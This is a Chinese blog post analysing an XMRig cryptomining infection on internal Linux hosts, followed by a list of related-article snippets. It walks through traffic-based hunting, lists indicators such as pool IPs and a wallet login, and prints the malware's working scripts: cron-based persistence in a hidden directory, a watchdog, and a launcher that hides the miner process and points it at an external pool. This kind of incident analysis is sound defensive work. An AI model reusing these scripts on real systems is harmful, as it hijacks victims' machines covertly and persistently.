记挖矿样本流程分析

已于 2023-09-11 11:44:07 修改
阅读量3.5k 收藏 5
点赞数
分类专栏: 信息安全 文章标签: 挖矿 应急响应 linux 区块链
于 2021-11-15 11:28:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45491298/article/details/121330804
版权

记挖矿样本流程分析

背景:

内网发现某台主机大量资源占用,态势感知告警挖矿行为。
内网挖矿流程:
在这里插入图片描述

初步排查思路:

公网矿池为单一地址,威胁情报未标记,根据流量特征判断为矿池,可作为依据使用态势感知批量查找建立过连接的主机。
通过态势感知排查挖矿流量特征,内网传输情况。
内网多台矿池,矿池做为转发功能,资源占用较小;主要根据流量方向判断。
排查多台中病毒主机之间流量行为,有无异常,排查跳板机情况。
跳板机可能无挖矿行为,由A中病毒主机连接B正常主机再连接C中病毒主机,则主机B可能被利用。

态势感知排查该家族思路:

发现一台矿机后,定位该矿机连接的矿池;
根据该矿池,定位多台连接矿机;
逐台矿机排查是否连接多台矿池;
根据公网矿池,筛查内网矿池,或直连公网的矿机;
根据上述发现内网挖矿流量传输使用33033端口,排查内网所有33033端口连接;

挖矿流量样本:

{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46iM99N18KTNafBX6X2KMP6GkmBSwLpHKfuNSuLuBvFaVNd776wvp7jC1TMiP7t5HL2Bs2ngF1UND6rcEnkwRAsA9nhJ4KH","pass":"GOLD","agent":"Java/(Update) (Linux x86_64) libuv/1.38.0 gcc/7.2.0","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz"]}}

{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"7521d1cadbcfa91eec65aa16715b94ffc1c9654ba57ea2ef1a2127bca1127a83","pass":"x","agent":"XMRig/6.3.3 (Linux x86_64) libuv/1.38.0 gcc/7.3.1","url":"stratum+ssl://134.209.104.66:443","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","cn/1","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt"]}}

提取样本中特征:

134.209.104.66
pass:GOLD
pass:x
XMRIG

态势感知批量查找与134.209.104.66建立连接的主机,均感染病毒
Xmrig/6.3.3得知病毒家族、种类:
在这里插入图片描述
该家族样本默认文件名为:xmrig
主机find / -name “*xmrig*”

样本分析:

脚本c:

在这里插入图片描述
unset 删除环境变量
export 设置环境变量
HISTFILE 历史命令记录文件
HISTSIZE 历史命令记录数
HISTFILESIZE 历史命令记录文件中记录的命令数
删除计划任务
Chattr将tmp目录下文件解锁
Kill杀掉系统进程

运行起始脚本a:

pwd > dir.dir
dir=$(cat dir.dir)
echo "* * * * * $dir/upd >/dev/null 2>&1" > cron.d
echo "@reboot $dir/upd >/dev/null 2>&1" >> cron.d
crontab cron.d
crontab -l | grep upd
echo "#!/bin/sh
if test -r $dir/bash.pid; then
pid=\$(cat $dir/bash.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
sleep 1
else
cd $dir
./run &>/dev/null
exit 0
fi
fi" >upd
chmod u+x upd
./run &>/dev/null

生成dir.dir文件:

在这里插入图片描述

同级目录产生cron.d:

* * * * * /usr/include/arpa/.x/upd >/dev/null 2>&1
@reboot /usr/include/arpa/.x/upd >/dev/null 2>&1

定期执行upd 脚本文件:

#!/bin/sh
if test -r /usr/include/arpa/.x/bash.pid; then
pid=$(cat /usr/include/arpa/.x/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
sleep 1
else
cd /usr/include/arpa/.x
./run &>/dev/null
exit 0
fi
fi

判断bash.pid文件是否为空,非空则杀掉其中的进程
防止病毒文件重复运行

Bash.pid文件:

在这里插入图片描述

执行 run脚本:

proc=`nproc`
ARCH=`uname -m`
HIDE="xmrig"

if [ "$ARCH" == "i686" ];       then
        ./h32 -s $HIDE ./stak3/ld-linux.so.2 --library-path stak3 stak3/xmrig -o 51.195.221.110:443 -a cn/r -k >>/dev/null &
elif [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./stak/ld-linux-x86-64.so.2 --library-path stak stak/xmrig -o 51.195.221.110:443 -k >>/dev/null &
fi
echo $! > bash.pid

判断系统架构,分别执行不同的木马文件,连接地址51.195.221.110(英国 英格兰 伦敦 微步未定义)
更新bash.pid文件

应急响应】Windows应急响应手册(准备阶段、挖矿病毒)
李火火的安全圈
07-16 1758
本篇文章主要以WIndows系统为例围绕红蓝对抗和攻防角度实施应急响应的技术手段,以多方面、多维度进行展开,对于常见的应急事件所采取的应对措施进行阐述,希望对从事网安工作的小伙伴们有所帮助!
[网络安全自学篇] 三十五.恶意代码攻击检测及恶意样本分析
热门推荐
杨秀璋的专栏
12-26 1万+
本文主要结合作者的《系统安全前沿》作业,相关论文及绿盟李东宏老师的博客,从产业界和学术界分别详细讲解恶意代码攻击溯源的相关知识。在学术界方面,用类似于综述来介绍攻击追踪溯源的不同方法;在产业界方面,主要参考李东宏老师从企业恶意样本分析的角度介绍溯源工作。关于攻击溯源的博客和论文都比较少,希望这篇文章对您有所帮助,如果文章中存在错误或理解不到位的地方,还请告知作者与海涵~
挖矿蠕虫样本分析
weixin_30319153的博客
11-16 508
转载于:https://www.cnblogs.com/0x4D75/p/9970491.html
linux遭入侵挖矿进程被隐藏案例分析
whatday的专栏
10-25 2547
目录 一、背景 二、入侵分析 三、样本分析 四、附录 IOCs: 一、背景 云鼎实验室曾分析不少入侵挖矿案例,研究发现入侵挖矿行为都比较粗暴简单,通过 top 等命令可以直接看到恶意进程,挖矿进程不会被刻意隐藏;而现在,我们发现黑客开始不断使用一些隐藏手段去隐藏挖矿进程而使它获得更久存活,今天分析的内容是我们过去一个月内捕获的一起入侵挖矿事件。 二、入侵分析 本次捕获案例的入侵流程与以往相比,没有特殊的地方,也是利用通用漏洞入侵服务器并获得相关权限,从而植入挖矿程序再进行隐藏。 通过对几
164天:应急响应-挖矿脚本检测指南_威胁情报_样本定性_文件清除_入口修复
weixin_71529930的博客
09-25 1085
但是这里有个弊端就是不显示计划任务创建的时间,所以还是建议去windows自带的计划任务管理器中确认时间,以便于后期溯源,时间为2022/3/23 9:46:17。某公司运维人员小李近期发现,通过搜索引擎访问该公司网站会自动跳转到恶意网站(博彩网站),但是直接输入域名访问该公司网站,则不会出现跳转问题,而且服务器。这里我直接利用火绒剑去排查,删除掉计划任务,同时删除木马目录(但是不太理解为什么需要删除掉进程还显示在运行,重启才删除掉了)已知计划任务创建的时间为: 2022/3/23 9:46:17。
应急响应挖矿脚本检测指南&威胁情报&样本定性&文件清除&入口修复
今天是几号的博客
04-25 3327
某公司运维人员小李近期发现,通过搜索引擎访问该公司网站会自动跳转到恶意网站(博彩网站),但是直接输入域名访问该公司网站,则不会出现跳转问题,而且服务器CPU的使用率异常高,运维人员认为该公司服务器可能被黑客入侵了,现小李向XX安全公司求助,解决网站跳转问题。某天客户反馈:服务器疑似被入侵,风扇噪声很大,实验室因耗电量太大经常跳闸,服务器疑似被挖矿挖矿程序定位定性,时间分析,排查安全漏洞,攻击IP找到等。3、删除市场上已知挖矿脚本(恶意竞争了,属于是)危害:CPU拉满,网络阻塞,服务器卡顿、耗电等。
2、监控系统zabbix自动发现
2401_87896172的博客
01-08 790
自动发现代理设置snmp----------->监控网络设备监控的模式:1、zabbix主动模式和被动模式主动和被动模式都是对于客户端而言的。主动模式:客户端主动将数据发送给server或者代理被动模式:服务端或者porxy(代理)主动去找客户端索要数据---------------------------被动模式(mor),被动模式在成规模的集群(成百上千台的),都是由服务端主动去找,那么服务端的压力会很大。
挖矿病毒应急响应处置手册
最新发布
安全狐
03-21 874
通常来说,当我们的服务器或PC资源(CPU)使用率接近或超过100%,并持续高居不下导致服务器或PC操作延缓,我们就可以判定被挖矿。常见挖矿其它特征如下:服务器或PC访问过不受信任的地址,这些地址包括:主机、IP、域名。这是由于大部分挖矿都需要从一个不受信任的地址下载初始化程序,而不受信任的来源主要是:第三方情报结构,企业内部历史数据沉淀。服务器或PC新增异常或恶意文件、进程或服务,并且大部分异常文件保存在服务器或PC的TMP目录中。服务器或PC的定时任务发生变更。
Linux应急响应思路和技巧(一):进程分析
WangsuSecurity的博客
05-27 1995
本文总结自网宿安全演武实验室安全应急响应团队日常工作实践
恶意软件分析样本处理技术
恶意软件分析概述 ## 1.1 恶意软件的定义和分类 恶意软件是指具有恶意目的、不被用户所知晓的计算机程序或代码。它可以通过操纵系统或窃取敏感信息来造成损害或盗取价值。恶意软件按其传播方式、攻击目标和功能...
jsonRPC.rar
05-08
jsonRPC.rar 是jsonRPC的入门案例,供参考来快速使用jsonRPC,不好勿喷
Linux应急响应思路和技巧(三):网络分析
WangsuSecurity的博客
12-09 1169
通过对系统网络监听、网络连接、甚至流量进行分析,可以帮助定位入侵入口和入侵手法
zabbix可利用的表结构及api的调用
10-24 5332
主要要实现的功能: 1):获取所有主机组以及主机组下的主机 2):获取相关主机的所有监控项以及最近的值 3):获取相关主机最近报警的trigger 实现方法: 1         zabbix表结构(重要的字段) 1.1     groups、hosts表     其中hosts表中的status代表主机是否启用监控,0为监
Linux服务器被黑用作矿机的排查过程 ld-linux-x86-64 占用CPU过高
山水牧羊
08-22 3424
2019年8月22日 今天一台测试用服务器出现异常,最终确定是挖矿病毒,分享一下排查处理过程。 现象 1.ld-linux-x86-64进程占用CPU 90%,用户为oracle。 2.手工kill掉过一会还会再出现。 排查过程 1.切换到oracle用户,su - oracle 2.查看定时任务,crontab -e,发现有如下定时任务 /home/oracle/.cac...
处理服务器上的挖矿木马小
路边的水沟的博客
11-14 2429
文章目录处理服务器上的挖矿木马小挖矿木马发现挖矿程序定位(失败)异常用户排查挖矿程序定位(成功)挖矿木马分析解决木马的方法 处理服务器上的挖矿木马小 参考: https://zhuanlan.zhihu.com/p/405165722 https://www.modb.pro/db/107110 挖矿木马发现 通过nvidia-smi发现异常占用程序python36 nvidia-smi 挖矿程序定位(失败) 通过ps命令获取进程相关信息 ps -ef | grep python3
open-ethereum-pool以太坊矿池源码分析(5)proxy模块
尹成区块链团队的技术博客
05-20 2473
# open-ethereum-pool以太坊矿池-proxy模块## ProxyServer定义```gotype ProxyServer struct { config *Config blockTemplate atomic.Value upstream int32 upstream...
API批量操作、zabbix 监控
m0_62341392的博客
12-22 1975
步骤参考官方原文: https://www.zabbix.com/documentation/5.0/zh/manual/api API 验证: 【在访问Zabbix中的任何数据之前,你需要登录并获取身份验证令牌。这可以使用该 user.login 方法完成。让我们假设你想要以标准Zabbix Admin用户身份登录。然后,你的JSON请求将如下所示:】server1: vim zabbix-api.sh curl -s -XPOST http://172.25.70.1/zabbix/api..
对于挖矿的检测以及防御方案
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
03-21 2641
网上对于挖矿的检测也有很多的专业文章,笔者在此就对网上的文章做一个汇总再加上自己的一些不太成熟的想法,欢迎各位师傅们的探讨,当然,检测的方法还是从2个方向出发,基于流量层的检测以及主机行为的检测。
03课:以太坊常见 JSON-RPC 接口解析
Forrest Gump · 技术宅
04-26 9493
03课:以太坊常见 JSON-RPC 接口解析以太坊提供了一套基于 JSON-RPC 的接口调用,通过这些接口调用我们可以方便的进行相关的查询、挖矿、发起交易等操作。今天带大家了解一下比较常见的一些 JSON-RPC 接口。什么是 JSON-RPCJSON RPC(Remote Protocol Call)是一种以 JSON 为协议的远程调用服务,具有开发调试简单、多平台通用的特性。很明显是通过...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值